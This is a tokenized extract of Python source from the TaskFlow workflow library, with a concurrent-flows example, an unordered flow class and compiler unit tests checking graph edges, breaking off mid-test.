<s> import logging <EOL> import os <EOL> import random <EOL> import sys <EOL> import time <EOL> logging . basicConfig ( level = logging . ERROR ) <EOL> top_dir = os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) , <EOL> os . pardir , <EOL> os . pardir ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , top_dir ) <EOL> import futurist <EOL> import six <EOL> from taskflow import engines <EOL> from taskflow . patterns import unordered_flow as uf <EOL> from taskflow import task <EOL> from taskflow . utils import threading_utils as tu <EOL> class DelayedTask ( task . Task ) : <EOL> def __init__ ( self , name ) : <EOL> super ( DelayedTask , self ) . __init__ ( name = name ) <EOL> self . _wait_for = random . random ( ) <EOL> def execute ( self ) : <EOL> print ( "<STR_LIT>" % ( self . name , tu . get_ident ( ) ) ) <EOL> time . sleep ( self . _wait_for ) <EOL> f1 = uf . Flow ( "<STR_LIT>" ) <EOL> f1 . add ( DelayedTask ( "<STR_LIT>" ) ) <EOL> f1 . add ( DelayedTask ( "<STR_LIT>" ) ) <EOL> f2 = uf . Flow ( "<STR_LIT>" ) <EOL> f2 . add ( DelayedTask ( "<STR_LIT>" ) ) <EOL> f2 . add ( DelayedTask ( "<STR_LIT>" ) ) <EOL> with futurist . ThreadPoolExecutor ( ) as ex : <EOL> e1 = engines . load ( f1 , engine = '<STR_LIT>' , executor = ex ) <EOL> e2 = engines . load ( f2 , engine = '<STR_LIT>' , executor = ex ) <EOL> iters = [ e1 . run_iter ( ) , e2 . run_iter ( ) ] <EOL> cloned_iters = list ( iters ) <EOL> while iters : <EOL> for it in cloned_iters : <EOL> try : <EOL> six . next ( it ) <EOL> except StopIteration : <EOL> try : <EOL> iters . remove ( it ) <EOL> except ValueError : <EOL> pass </s>
<s> from taskflow import flow <EOL> from taskflow . types import graph as gr <EOL> class Flow ( flow . Flow ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , retry = None ) : <EOL> super ( Flow , self ) . __init__ ( name , retry ) <EOL> self . _graph = gr . Graph ( name = name ) <EOL> def add ( self , * items ) : <EOL> """<STR_LIT>""" <EOL> for item in items : <EOL> if not self . _graph . has_node ( item ) : <EOL> self . _graph . add_node ( item ) <EOL> return self <EOL> def __len__ ( self ) : <EOL> return len ( self . _graph ) <EOL> def __iter__ ( self ) : <EOL> for item in self . _graph : <EOL> yield item <EOL> def iter_links ( self ) : <EOL> for ( u , v , e_data ) in self . _graph . edges_iter ( data = True ) : <EOL> yield ( u , v , e_data ) <EOL> def iter_nodes ( self ) : <EOL> for n , n_data in self . _graph . nodes_iter ( data = True ) : <EOL> yield ( n , n_data ) <EOL> @ property <EOL> def requires ( self ) : <EOL> requires = set ( ) <EOL> retry_provides = set ( ) <EOL> if self . _retry is not None : <EOL> requires . update ( self . _retry . requires ) <EOL> retry_provides . update ( self . _retry . provides ) <EOL> for item in self : <EOL> item_requires = item . requires - retry_provides <EOL> requires . update ( item_requires ) <EOL> return frozenset ( requires ) </s>
<s> from taskflow import engines <EOL> from taskflow . engines . action_engine import compiler <EOL> from taskflow import exceptions as exc <EOL> from taskflow . patterns import graph_flow as gf <EOL> from taskflow . patterns import linear_flow as lf <EOL> from taskflow . patterns import unordered_flow as uf <EOL> from taskflow import retry <EOL> from taskflow import test <EOL> from taskflow . tests import utils as test_utils <EOL> def _replicate_graph_with_names ( compilation ) : <EOL> g = compilation . execution_graph <EOL> n_g = g . __class__ ( name = g . name ) <EOL> for node , node_data in g . nodes_iter ( data = True ) : <EOL> n_g . add_node ( node . name , attr_dict = node_data ) <EOL> for u , v , u_v_data in g . edges_iter ( data = True ) : <EOL> n_g . add_edge ( u . name , v . name , attr_dict = u_v_data ) <EOL> return n_g <EOL> class PatternCompileTest ( test . TestCase ) : <EOL> def test_task ( self ) : <EOL> task = test_utils . DummyTask ( name = '<STR_LIT:a>' ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( task ) . compile ( ) ) <EOL> self . assertEqual ( [ '<STR_LIT:a>' ] , list ( g . nodes ( ) ) ) <EOL> self . assertEqual ( [ ] , list ( g . edges ( ) ) ) <EOL> def test_retry ( self ) : <EOL> r = retry . AlwaysRevert ( '<STR_LIT>' ) <EOL> self . assertRaises ( TypeError , compiler . PatternCompiler ( r ) . compile ) <EOL> def test_wrong_object ( self ) : <EOL> msg_regex = '<STR_LIT>' <EOL> self . assertRaisesRegexp ( TypeError , msg_regex , <EOL> compiler . PatternCompiler ( <NUM_LIT> ) . compile ) <EOL> def test_empty ( self ) : <EOL> flo = lf . Flow ( "<STR_LIT:test>" ) <EOL> compiler . PatternCompiler ( flo ) . compile ( ) <EOL> def test_linear ( self ) : <EOL> a , b , c , d = test_utils . make_many ( <NUM_LIT:4> ) <EOL> flo = lf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b , c ) <EOL> inner_flo = lf . Flow ( "<STR_LIT>" ) <EOL> inner_flo . add ( d ) <EOL> flo . add ( inner_flo ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:8> , len ( g ) ) <EOL> order = g . topological_sort ( ) <EOL> self . assertEqual ( [ '<STR_LIT:test>' , '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' , <EOL> "<STR_LIT>" , '<STR_LIT:d>' , "<STR_LIT>" , <EOL> '<STR_LIT>' ] , order ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT:c>' , "<STR_LIT>" ) ) <EOL> self . assertTrue ( g . has_edge ( "<STR_LIT>" , '<STR_LIT:d>' ) ) <EOL> self . assertEqual ( { '<STR_LIT>' : True } , <EOL> g . get_edge_data ( "<STR_LIT>" , '<STR_LIT:d>' ) ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , list ( g . no_successors_iter ( ) ) ) <EOL> self . assertEqual ( [ '<STR_LIT:test>' ] , list ( g . no_predecessors_iter ( ) ) ) <EOL> def test_invalid ( self ) : <EOL> a , b , c = test_utils . make_many ( <NUM_LIT:3> ) <EOL> flo = lf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b , c ) <EOL> flo . add ( flo ) <EOL> self . assertRaises ( ValueError , <EOL> compiler . PatternCompiler ( flo ) . compile ) <EOL> def test_unordered ( self ) : <EOL> a , b , c , d = test_utils . make_many ( <NUM_LIT:4> ) <EOL> flo = uf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b , c , d ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:6> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:a>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:b>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:c>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:d>' ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:d>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> self . assertEqual ( set ( [ '<STR_LIT:test>' ] ) , set ( g . no_predecessors_iter ( ) ) ) <EOL> def test_linear_nested ( self ) : <EOL> a , b , c , d = test_utils . make_many ( <NUM_LIT:4> ) <EOL> flo = lf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b ) <EOL> inner_flo = uf . Flow ( "<STR_LIT>" ) <EOL> inner_flo . add ( c , d ) <EOL> flo . add ( inner_flo ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:8> , len ( g ) ) <EOL> sub_g = g . subgraph ( [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> self . assertFalse ( sub_g . has_edge ( '<STR_LIT:b>' , '<STR_LIT:a>' ) ) <EOL> self . assertTrue ( sub_g . has_edge ( '<STR_LIT:a>' , '<STR_LIT:b>' ) ) <EOL> self . assertEqual ( { '<STR_LIT>' : True } , sub_g . get_edge_data ( "<STR_LIT:a>" , "<STR_LIT:b>" ) ) <EOL> sub_g = g . subgraph ( [ '<STR_LIT:c>' , '<STR_LIT:d>' ] ) <EOL> self . assertEqual ( <NUM_LIT:0> , sub_g . number_of_edges ( ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT:b>' , '<STR_LIT>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT:c>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT:d>' ) ) <EOL> def test_unordered_nested ( self ) : <EOL> a , b , c , d = test_utils . make_many ( <NUM_LIT:4> ) <EOL> flo = uf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b ) <EOL> flo2 = lf . Flow ( "<STR_LIT>" ) <EOL> flo2 . add ( c , d ) <EOL> flo . add ( flo2 ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:8> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:a>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:b>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:c>' ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT:d>' ) , <EOL> ( '<STR_LIT:d>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> def test_unordered_nested_in_linear ( self ) : <EOL> a , b , c , d = test_utils . make_many ( <NUM_LIT:4> ) <EOL> inner_flo = uf . Flow ( '<STR_LIT>' ) . add ( b , c ) <EOL> flo = lf . Flow ( '<STR_LIT>' ) . add ( a , inner_flo , d ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:8> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( ) , [ <EOL> ( '<STR_LIT>' , '<STR_LIT:a>' ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:b>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:c>' ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:d>' ) , <EOL> ( '<STR_LIT:d>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> def test_graph ( self ) : <EOL> a , b , c , d = test_utils . make_many ( <NUM_LIT:4> ) <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b , c , d ) <EOL> compilation = compiler . PatternCompiler ( flo ) . compile ( ) <EOL> self . assertEqual ( <NUM_LIT:6> , len ( compilation . execution_graph ) ) <EOL> self . assertEqual ( <NUM_LIT:8> , compilation . execution_graph . number_of_edges ( ) ) <EOL> def test_graph_nested ( self ) : <EOL> a , b , c , d , e , f , g = test_utils . make_many ( <NUM_LIT:7> ) <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b , c , d ) <EOL> flo2 = lf . Flow ( '<STR_LIT>' ) <EOL> flo2 . add ( e , f , g ) <EOL> flo . add ( flo2 ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:11> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:a>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:b>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:c>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:d>' ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:d>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:e>' ) , <EOL> ( '<STR_LIT:e>' , '<STR_LIT:f>' ) , <EOL> ( '<STR_LIT:f>' , '<STR_LIT:g>' ) , <EOL> ( '<STR_LIT:g>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> def test_graph_nested_graph ( self ) : <EOL> a , b , c , d , e , f , g = test_utils . make_many ( <NUM_LIT:7> ) <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b , c , d ) <EOL> flo2 = gf . Flow ( '<STR_LIT>' ) <EOL> flo2 . add ( e , f , g ) <EOL> flo . add ( flo2 ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:11> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:a>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:b>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:c>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:d>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:e>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:f>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:g>' ) , <EOL> ( '<STR_LIT:e>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:f>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:g>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:d>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> def test_graph_links ( self ) : <EOL> a , b , c , d = test_utils . make_many ( <NUM_LIT:4> ) <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b , c , d ) <EOL> flo . link ( a , b ) <EOL> flo . link ( b , c ) <EOL> flo . link ( c , d ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:6> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:a>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT:b>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT:c>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT:d>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:d>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertItemsEqual ( [ '<STR_LIT:test>' ] , g . no_predecessors_iter ( ) ) <EOL> self . assertItemsEqual ( [ '<STR_LIT>' ] , g . no_successors_iter ( ) ) <EOL> def test_graph_dependencies ( self ) : <EOL> a = test_utils . ProvidesRequiresTask ( '<STR_LIT:a>' , provides = [ '<STR_LIT:x>' ] , requires = [ ] ) <EOL> b = test_utils . ProvidesRequiresTask ( '<STR_LIT:b>' , provides = [ ] , requires = [ '<STR_LIT:x>' ] ) <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) . add ( a , b ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:4> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:a>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT:b>' , { '<STR_LIT>' : set ( [ '<STR_LIT:x>' ] ) } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertItemsEqual ( [ '<STR_LIT:test>' ] , g . no_predecessors_iter ( ) ) <EOL> self . assertItemsEqual ( [ '<STR_LIT>' ] , g . no_successors_iter ( ) ) <EOL> def test_graph_nested_requires ( self ) : <EOL> a = test_utils . ProvidesRequiresTask ( '<STR_LIT:a>' , provides = [ '<STR_LIT:x>' ] , requires = [ ] ) <EOL> b = test_utils . ProvidesRequiresTask ( '<STR_LIT:b>' , provides = [ ] , requires = [ ] ) <EOL> c = test_utils . ProvidesRequiresTask ( '<STR_LIT:c>' , provides = [ ] , requires = [ '<STR_LIT:x>' ] ) <EOL> inner_flo = lf . Flow ( "<STR_LIT>" ) . add ( b , c ) <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) . add ( a , inner_flo ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:7> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:a>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:b>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' , { '<STR_LIT>' : set ( [ '<STR_LIT:x>' ] ) } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT:c>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertItemsEqual ( [ '<STR_LIT:test>' ] , list ( g . no_predecessors_iter ( ) ) ) <EOL> self . assertItemsEqual ( [ '<STR_LIT>' ] , list ( g . no_successors_iter ( ) ) ) <EOL> def test_graph_nested_provides ( self ) : <EOL> a = test_utils . ProvidesRequiresTask ( '<STR_LIT:a>' , provides = [ ] , requires = [ '<STR_LIT:x>' ] ) <EOL> b = test_utils . ProvidesRequiresTask ( '<STR_LIT:b>' , provides = [ '<STR_LIT:x>' ] , requires = [ ] ) <EOL> c = test_utils . ProvidesRequiresTask ( '<STR_LIT:c>' , provides = [ ] , requires = [ ] ) <EOL> inner_flo = lf . Flow ( "<STR_LIT>" ) . add ( b , c ) <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) . add ( a , inner_flo ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:7> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:a>' , { '<STR_LIT>' : set ( [ '<STR_LIT:x>' ] ) } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:b>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT:c>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertItemsEqual ( [ '<STR_LIT:test>' ] , g . no_predecessors_iter ( ) ) <EOL> self . assertItemsEqual ( [ '<STR_LIT>' ] , g . no_successors_iter ( ) ) <EOL> def test_empty_flow_in_linear_flow ( self ) : <EOL> flo = lf . Flow ( '<STR_LIT>' ) <EOL> a = test_utils . ProvidesRequiresTask ( '<STR_LIT:a>' , provides = [ ] , requires = [ ] ) <EOL> b = test_utils . ProvidesRequiresTask ( '<STR_LIT:b>' , provides = [ ] , requires = [ ] ) <EOL> empty_flo = gf . Flow ( "<STR_LIT>" ) <EOL> flo . add ( a , empty_flo , b ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertItemsEqual ( g . edges ( ) , [ <EOL> ( "<STR_LIT>" , "<STR_LIT:a>" ) , <EOL> ( "<STR_LIT:a>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT:b>" ) , <EOL> ( "<STR_LIT:b>" , "<STR_LIT>" ) , <EOL> ] ) <EOL> def test_many_empty_in_graph_flow ( self ) : <EOL> flo = gf . Flow ( '<STR_LIT:root>' ) <EOL> a = test_utils . ProvidesRequiresTask ( '<STR_LIT:a>' , provides = [ ] , requires = [ ] ) <EOL> flo . add ( a ) <EOL> b = lf . Flow ( '<STR_LIT:b>' ) <EOL> b_0 = test_utils . ProvidesRequiresTask ( '<STR_LIT>' , provides = [ ] , requires = [ ] ) <EOL> b_1 = lf . Flow ( '<STR_LIT>' ) <EOL> b_2 = lf . Flow ( '<STR_LIT>' ) <EOL> b_3 = test_utils . ProvidesRequiresTask ( '<STR_LIT>' , provides = [ ] , requires = [ ] ) <EOL> b . add ( b_0 , b_1 , b_2 , b_3 ) <EOL> flo . add ( b ) <EOL> c = lf . Flow ( '<STR_LIT:c>' ) <EOL> c_0 = lf . Flow ( '<STR_LIT>' ) <EOL> c_1 = lf . Flow ( '<STR_LIT>' ) <EOL> c_2 = lf . Flow ( '<STR_LIT>' ) <EOL> c . add ( c_0 , c_1 , c_2 ) <EOL> flo . add ( c ) <EOL> d = test_utils . ProvidesRequiresTask ( '<STR_LIT:d>' , provides = [ ] , requires = [ ] ) <EOL> flo . add ( d ) <EOL> flo . link ( b , d ) <EOL> flo . link ( a , d ) <EOL> flo . link ( c , d ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT:root>' , '<STR_LIT:a>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT:root>' , '<STR_LIT:b>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT:root>' , '<STR_LIT:c>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT:a>' , '<STR_LIT:d>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT:d>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT:d>' ) ) <EOL> self . assertEqual ( <NUM_LIT:20> , len ( g ) ) <EOL> def test_empty_flow_in_nested_flow ( self ) : <EOL> flow = lf . Flow ( '<STR_LIT>' ) <EOL> a = test_utils . ProvidesRequiresTask ( '<STR_LIT:a>' , provides = [ ] , requires = [ ] ) <EOL> b = test_utils . ProvidesRequiresTask ( '<STR_LIT:b>' , provides = [ ] , requires = [ ] ) <EOL> flow2 = lf . Flow ( "<STR_LIT>" ) <EOL> c = test_utils . ProvidesRequiresTask ( '<STR_LIT:c>' , provides = [ ] , requires = [ ] ) <EOL> d = test_utils . ProvidesRequiresTask ( '<STR_LIT:d>' , provides = [ ] , requires = [ ] ) <EOL> empty_flow = gf . Flow ( "<STR_LIT>" ) <EOL> flow2 . add ( c , empty_flow , d ) <EOL> flow . add ( a , flow2 , b ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flow ) . compile ( ) ) <EOL> for u , v in [ ( '<STR_LIT>' , '<STR_LIT:a>' ) , ( '<STR_LIT:a>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:c>' ) , ( '<STR_LIT:c>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:d>' ) , ( '<STR_LIT:d>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:b>' ) , ( '<STR_LIT:b>' , '<STR_LIT>' ) ] : <EOL> self . assertTrue ( g . has_edge ( u , v ) ) <EOL> def test_empty_flow_in_graph_flow ( self ) : <EOL> flow = lf . Flow ( '<STR_LIT>' ) <EOL> a = test_utils . ProvidesRequiresTask ( '<STR_LIT:a>' , provides = [ '<STR_LIT:a>' ] , requires = [ ] ) <EOL> b = test_utils . ProvidesRequiresTask ( '<STR_LIT:b>' , provides = [ ] , requires = [ '<STR_LIT:a>' ] ) <EOL> empty_flow = lf . Flow ( "<STR_LIT>" ) <EOL> flow . add ( a , empty_flow , b ) <EOL> compilation = compiler . PatternCompiler ( flow ) . compile ( ) <EOL> g = compilation . execution_graph <EOL> self . assertTrue ( g . has_edge ( flow , a ) ) <EOL> self . assertTrue ( g . has_edge ( a , empty_flow ) ) <EOL> empty_flow_successors = g . successors ( empty_flow ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( empty_flow_successors ) ) <EOL> empty_flow_terminal = empty_flow_successors [ <NUM_LIT:0> ] <EOL> self . assertIs ( empty_flow , empty_flow_terminal . flow ) <EOL> self . assertEqual ( compiler . FLOW_END , <EOL> g . node [ empty_flow_terminal ] [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( g . has_edge ( empty_flow_terminal , b ) ) <EOL> def test_empty_flow_in_graph_flow_linkage ( self ) : <EOL> flow = gf . Flow ( '<STR_LIT>' ) <EOL> a = test_utils . ProvidesRequiresTask ( '<STR_LIT:a>' , provides = [ ] , requires = [ ] ) <EOL> b = test_utils . ProvidesRequiresTask ( '<STR_LIT:b>' , provides = [ ] , requires = [ ] ) <EOL> empty_flow = lf . Flow ( "<STR_LIT>" ) <EOL> flow . add ( a , empty_flow , b ) <EOL> flow . link ( a , b ) <EOL> compilation = compiler . PatternCompiler ( flow ) . compile ( ) <EOL> g = compilation . execution_graph <EOL> self . assertTrue ( g . has_edge ( a , b ) ) <EOL> self . assertTrue ( g . has_edge ( flow , a ) ) <EOL> self . assertTrue ( g . has_edge ( flow , empty_flow ) ) <EOL> def test_checks_for_dups ( self ) : <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) . add ( <EOL> test_utils . DummyTask ( name = "<STR_LIT:a>" ) , <EOL> test_utils . DummyTask ( name = "<STR_LIT:a>" ) <EOL> ) <EOL> e = engines . load ( flo ) <EOL> self . assertRaisesRegexp ( exc . Duplicate , <EOL> '<STR_LIT>' , <EOL> e . compile ) <EOL> def test_checks_for_dups_globally ( self ) : <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) . add ( <EOL> gf . Flow ( "<STR_LIT>" ) . add ( test_utils . DummyTask ( name = "<STR_LIT:a>" ) ) , <EOL> gf . Flow ( "<STR_LIT>" ) . add ( test_utils . DummyTask ( name = "<STR_LIT:a>" ) ) ) <EOL> e = engines . load ( flo ) <EOL> self . assertRaisesRegexp ( exc . Duplicate , <EOL> '<STR_LIT>' , <EOL> e . compile ) <EOL> def test_retry_in_linear_flow ( self ) : <EOL> flo = lf . Flow ( "<STR_LIT:test>" , retry . AlwaysRevert ( "<STR_LIT:c>" ) ) <EOL> compilation = compiler . PatternCompiler ( flo ) . compile ( ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( compilation . execution_graph ) ) <EOL> self . assertEqual ( <NUM_LIT:2> , compilation . execution_graph . number_of_edges ( ) ) <EOL> def test_retry_in_unordered_flow ( self ) : <EOL> flo = uf . Flow ( "<STR_LIT:test>" , retry . AlwaysRevert ( "<STR_LIT:c>" ) ) <EOL> compilation = compiler . PatternCompiler ( flo ) . compile ( ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( compilation . execution_graph ) ) <EOL> self . assertEqual ( <NUM_LIT:2> , compilation . execution_graph . number_of_edges ( ) ) <EOL> def test_retry_in_graph_flow ( self ) : <EOL> flo = gf . Flow ( "<STR_LIT:test>" , retry . AlwaysRevert ( "<STR_LIT:c>" ) ) <EOL> compilation = compiler . PatternCompiler ( flo ) . compile ( ) <EOL> g = compilation . execution_graph <EOL> self . assertEqual ( <NUM_LIT:3> , len ( g ) ) <EOL> self . assertEqual ( <NUM_LIT:2> , g . number_of_edges ( ) ) <EOL> def test_retry_in_nested_flows ( self ) : <EOL> c1 = retry . AlwaysRevert ( "<STR_LIT>" ) <EOL> c2 = retry . AlwaysRevert ( "<STR_LIT>" ) <EOL> inner_flo = lf . Flow ( "<STR_LIT>" , c2 ) <EOL> flo = lf . Flow ( "<STR_LIT:test>" , c1 ) . add ( inner_flo ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:6> , len ( 